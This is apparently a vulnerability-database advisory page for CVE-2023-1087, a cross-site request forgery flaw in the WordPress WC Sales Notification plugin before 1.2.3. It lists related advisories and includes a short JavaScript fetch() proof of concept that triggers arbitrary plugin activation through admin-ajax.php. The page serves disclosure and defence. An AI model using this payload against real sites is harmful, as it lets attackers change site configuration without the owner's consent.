WC Sales Notification Arbitrary Plugin Activation via CSR
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | Cross site request forgery (csrf) | 27 Mar 202316:15 | – | prion |
![]() | WordPress WC Sales Notification Plugin < 1.2.3 is vulnerable to Cross Site Request Forgery (CSRF) | 2 Mar 202300:00 | – | patchstack |
![]() | CVE-2023-1087 | 27 Mar 202316:15 | – | cve |
![]() | CVE-2023-1087 WC Sales Notification < 1.2.3 - Arbitrary Plugin Activation via CSRF | 27 Mar 202315:37 | – | cvelist |
![]() | CVE-2023-1087 | 27 Mar 202316:15 | – | nvd |
![]() | WC Sales Notification < 1.2.3 - Arbitrary Plugin Activation via CSRF | 28 Feb 202300:00 | – | wpvulndb |
![]() | Wordfence Intelligence Weekly WordPress Vulnerability Report (Feb 27, 2023 to Mar 5, 2023) | 9 Mar 202314:32 | – | wordfence |
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=wcsalesnotification_ajax_plugin_activation&location=woocommerce/woocommerce.php',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo